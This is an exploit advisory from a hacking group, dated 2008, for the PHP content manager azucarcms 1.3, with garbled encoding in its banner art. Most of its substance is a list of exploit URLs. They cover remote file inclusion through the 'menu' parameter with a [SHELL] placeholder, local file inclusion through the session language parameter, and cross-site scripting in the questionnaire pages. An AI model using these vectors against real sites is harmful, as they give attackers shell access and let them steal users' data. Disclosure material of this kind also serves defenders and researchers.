azucarcms-rfilfixss.txt
Posted on 24 June 2008
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââ C r a C k E r ââ ââ T H E C R A C K O F E T E R N A L M I G H T ââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ âââââ From The Ashes and Dust Rises An Unimaginable crack.... âââââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââ [ Remote File Include ] [ Local File Include ] [XSS] ââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ : Author : CraCkEr : : : â Group : uNiTeD CraCkiNg ForCE â â â â Script : azucarcms 1.3 â â Register Globals : â â Download : SourceForge.net â â â â Method : GET â â [â] ON [ ] OFF â â Critical : High [ââââââââ] â â â â Impact : System access â â â â âââââââââââââââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââââââ â â DALnet #crackers ââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ : : â Release Notes: â â âââââââââââââ â â Typically used for remotely exploitable vulnerabilities that can lead to â â system compromise. â â â ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââ Exploit URL's ââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ [RFI] http://localhost/path/src/contenido/vistas/articulos_opcionespos.php?menu=[SHELL] http://localhost/path/src/contenido/vistas/articulos_publicar.php?menu=[SHELL] http://localhost/path/src/contenido/vistas/indice_contenido.php?menu=[SHELL] [LFI] http://localhost/path/src/sistema/vistas/template/tpl_index.php?_SESSION[lang]=[LFI] http://localhost/path/html/sitio/vistas/es_ES/index.php?_SESSION[lang]=[LFI] [XSS] http://localhost/path/src/cuestionarios/vistas/crear_pregunta.php?orden_preg=[XSS] http://localhost/path/src/cuestionarios/vistas/crear_pregunta.php?nombre_cuestionario=[XSS] http://localhost/path/src/cuestionarios/vistas/editar_pregunta.php?orden_preg=[XSS] http://localhost/path/src/cuestionarios/vistas/editar_pregunta.php?nombre_cuestionario=[XSS] http://localhost/path/src/cuestionarios/vistas/respuestas_individuales.php?usuario=[XSS] ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ Greets: The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââ © CraCkEr 2008 ââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ